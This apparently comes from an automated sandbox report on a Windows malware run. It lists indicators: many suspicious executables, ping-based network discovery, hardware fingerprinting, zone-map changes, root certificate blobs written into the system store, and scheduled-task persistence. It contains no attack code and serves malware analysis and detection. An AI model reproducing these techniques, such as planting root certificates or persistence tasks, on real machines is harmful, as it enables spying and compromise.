Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\aaa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\gay.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\22.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Help\Winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\TXPlatforn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\4.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\svchost.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 040000000100000010000000cb17e431673ee209fe455793f30afa1c0f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c953000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df1400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331330b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3617e000000010000000800000000c0032f2df8d6016800000001000000000000000300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e5190000000100000010000000d8b5fb368468620275d142ffd2aade372000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 5c000000010000000400000000080000190000000100000010000000d8b5fb368468620275d142ffd2aade370300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e56800000001000000000000007e000000010000000800000000c0032f2df8d6011d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3610b000000010000001200000056006500720069005300690067006e0000001400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331336200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703017f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c9040000000100000010000000cb17e431673ee209fe455793f30afa1c2000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a C:\Users\Admin\Downloads\HitmanPro_x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
